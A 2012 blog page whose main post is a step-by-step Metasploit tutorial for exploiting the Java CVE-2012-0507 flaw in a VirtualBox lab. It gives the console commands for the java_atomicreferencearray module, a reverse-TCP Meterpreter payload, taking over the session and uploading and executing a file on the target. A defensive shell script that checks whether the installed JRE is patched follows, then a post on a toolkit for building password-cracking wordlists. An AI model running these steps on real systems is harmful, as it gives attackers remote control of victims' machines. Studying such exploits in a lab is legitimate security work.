
Tuesday, September 25, 2012

How to easily hack a remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507

Whenever someone says "PenTesting tool", the first thing that comes to mind is Metasploit. Today, I am going to demonstrate how to use the Metasploit tool to exploit the popular Java AtomicReferenceArray Type Violation vulnerability (CVE-2012-0507).
About Metasploit:
Metasploit is a very powerful PenTesting tool. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. It is a very useful tool for information gathering, vulnerability scanning, exploit development, client-side exploits, and more.
Mastering the Framework: A free course from Offensive-Security
The Offensive Security team, along with several active community members, made a free course on the Metasploit Framework, "Mastering the Framework". The course covers information gathering, social engineering attacks, exploit development, advanced AV avoidance, and more.

The course is available here:


Donate to HFC, Feed a Child!
"Mastering the Framework" is a free course. If you enjoyed the course, please donate to Hackers for Charity (HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is sent directly to Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:

Hey, where are you going? Wait a sec, take that course once I have demonstrated how to use Metasploit, because it will be hard to understand, or boring, if you read those things directly.

Requirements:
  • VirtualBox
  • Target OS (Windows, ...)
  • PenTesting distro (Backtrack)
  • JRE 6 (unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that the AtomicReferenceArray class implementation did not properly check whether the array is of the expected Object[] type. A malicious Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or to bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, the Flashback malware infected more than 600,000 Mac computers by exploiting this vulnerability. Recently, the INSS and Amnesty International UK websites were injected with malicious code that exploits CVE-2012-0507. I am going to demonstrate this vulnerability with VirtualBox. I have set up two virtual machines, named "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(Need help configuring the VMs? Read this: Setup PenTesting Lab.)

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is a recent vulnerability, you have to update the MSF before proceeding further.

Slow Internet connection?! If you have a slow Internet connection, you can download the java_atomicreferencearray module alone instead of updating all modules.
Download java_atomicreferencearray.rb and paste it into this folder: "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, download CVE-2012-0507.jar and paste it into this folder: "/opt/metasploit/msf3/data/exploits/"

Part III: Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:


Step 1:
Open the Terminal and type "msfconsole". This will bring up the Metasploit console, where you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray". This command selects the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display which settings are available and/or required for this specific module.



Now type "set SRVPORT 80" and "set URIPATH /".



Step 3: Set Payload
Type "show payloads"; this will display the list of payloads. We are going to use the 'reverse_tcp' payload. This payload makes the Target open a reverse TCP connection back to the PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address]: in order to get the reverse connection, we have to set our own IP in LHOST.

Open the Terminal and type "ifconfig". This will display the IP info of our PenTesting machine. The IP will be "192.168.56.x"; for instance, let me say the IP is 192.168.56.10.

Now type "set LHOST 192.168.56.10" in the msfconsole.



Part IV: Breaching the Target Machine:

So, are you ready?! Let us break into the Target machine.

Step 1:

Type "exploit" in the msfconsole. This starts the reverse handler on our machine and waits for anyone to connect to our HTTP server (e.g. http://192.168.56.10). Once the victim connects to our server, it sends a JAR file that exploits the CVE-2012-0507 vulnerability.

Step 2:

Open Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
The page loads nothing, but the exploit runs in the background.

Step 3:
Switch to the BT5 machine; it will display the following output:


Now type "sessions"; this will show the list of active sessions.

Type "sessions -i 1"; this opens the connection to the session with id '1' and brings you to Meterpreter. Meterpreter lets you interact with and control the Target.



Step 4: Upload files
Yeeeh..! We got a backdoor to the Target machine; now we can run any commands on the Target.



For example, typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files on the Target machine.

"upload /Test.exe c:\\": this command uploads Test.exe from the root ('file system') folder of BT5 to the C drive of the Target.

"execute -f C:\\Test.exe": this command runs our uploaded file on the Target.


Security Tips:
Update your JRE to the latest version.
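As an added example for the tip above (not code from the original post), a small POSIX shell check that classifies a JRE version string as affected by CVE-2012-0507 or not. It assumes, since the page does not state it, that the fix shipped in Java 6 Update 31 and Java 7 Update 3, treats Java 8 and later as post-fix, and reports anything older than Java 6 as unknown.

```shell
#!/bin/sh
# Added example, not part of the original post: is the installed JRE's
# version string at or beyond the fix for CVE-2012-0507?
# Assumption (not stated on the page): fixed in Java 6 Update 31 and
# Java 7 Update 3; Java 8+ post-dates the fix; older than Java 6 is unknown.

# java_is_patched VERSION
#   returns 0 if VERSION is at or beyond the fixed update level,
#           1 if it is an affected (pre-fix) release,
#           2 if the string cannot be classified.
java_is_patched() {
    ver="$1"
    case "$ver" in
        1.6.0_*) major=6; upd="${ver#1.6.0_}" ;;
        1.7.0_*) major=7; upd="${ver#1.7.0_}" ;;
        1.[89].*|[2-9]*|[1-9][0-9]*) return 0 ;;   # 1.8, 9, 10, 11, 17, ...
        *) return 2 ;;
    esac
    upd="${upd%%-*}"                                # drop build suffix: 31-b04 -> 31
    upd="$(printf '%s' "$upd" | sed 's/^0*//')"     # strip leading zeros: 03 -> 3
    [ -n "$upd" ] || upd=0
    case "$major" in
        6) [ "$upd" -ge 31 ] ;;
        7) [ "$upd" -ge 3 ] ;;
    esac
}

# installed_java_version: pulls the version string out of `java -version`,
# which prints to stderr, e.g. 'java version "1.6.0_29"' -> 1.6.0_29
installed_java_version() {
    java -version 2>&1 | sed -n 's/^[a-z]* version "\([^"]*\)".*/\1/p' | head -n 1
}

# report_java_status VERSION: prints a human-readable verdict for one string
report_java_status() {
    rc=0
    java_is_patched "$1" || rc=$?
    case "$rc" in
        0) echo "$1: at or beyond the fix for CVE-2012-0507" ;;
        1) echo "$1: AFFECTED by CVE-2012-0507, update the JRE" ;;
        *) echo "$1: could not classify this version string" ;;
    esac
}

v="$(installed_java_version)"
if [ -n "$v" ]; then report_java_status "$v"; else echo "no java found on PATH"; fi
```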

Conclusion:
I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability. I hope this will help you get into the PenTesting world..!

So, you enjoyed the tutorial, right?! If you have any suggestions or doubts, please drop a comment or mail me.

Monday, September 24, 2012

Unleash the power of Backtrack 5 with thad0ctor's Toolkit

The backbone of thad0ctor's Backtrack 5 Toolkit is the Wordlist Toolkit, which contains a plethora of tools to create, modify, and manipulate word lists so that end users can strengthen their systems by testing their passwords against a variety of tools designed to expose their passphrases. In short, it is the ultimate tool for those looking to make a wide variety of word lists for dictionary-based and other brute-force attacks.
The toolkit is designed with usability in mind for the Backtrack 5 R2 Linux distro, but will also work on BT5 R1 and other Ubuntu-based distros if configured properly. The script is constantly updated with multiple revisions to include new cutting-edge features and improvements in order to provide full-spectrum wordlist creation capabilities.
Features
  • Create word lists for SSNs, Phone Numbers, Date Ranges, Random Patterns, Password Policies, Patterns, from PDF/EBOOK files, for Default Router Passwords, or by profiling targets
  • Manipulate word lists by changing character cases, mirroring or doubling up words, reversing words prefixing or appending sequences of numbers or characters, inserting text, removing patterns or characters, converting words to 1337 speak, mangling words with John the Ripper and more
  • Optimize word lists by converting them to ASCII, trimming the words to set minimum and maximum lengths, sorting and removing duplicates, removing non-printable characters, splitting word lists into more manageable chunks and more
  • Analyze word lists by viewing their line count and a breakdown of their most common patterns and characters, search word lists for a certain string or substring, and calculate the time it would take to process a word list through an aircrack-ng or pyrit based dictionary attack
  • Combine individual word lists or word lists of a directory into a single word list and gather word lists system wide into one directory
  • Fully customize the usage of the script to streamline functionality. Change console output text color, configure passthrough attack options for certain attacks, toggle or force on or off the GTK and CLI versions of the script, toggle whether or not to display the start-up banner, toggle the main menu style and customize the script's 1337ify options.
  • Stay up to date with a fully integrated and foolproof update system that pulls directly from the script's Sourceforge page for up-to-the-minute updates, and configure whether or not you would like to auto-update the script on start-up.
  • Make sure everything is working properly and dependencies are met with an automated dependency check and install system that takes all the pain and guesswork out of dependency issues.
First, download the thad0ctor Toolkit from here to your desktop.
Now unzip the file: unzip thad0ctors.zip
Now you can start it with ./LAUNCH_TOOLKIT.sh
Now choose option 1, wordlist tools (creation, manipulation, combination, and analysis).
In the main menu, choose option 2 for wifi tools.
In the main menu, choose option 3 to view all of this script's word list tools.
In the main menu, choose option c for configure / install scripts and shortcuts / check dependencies.
In the main menu, choose option I for info / readme / upgrade / changelog / debug info / dev, RSS feed.
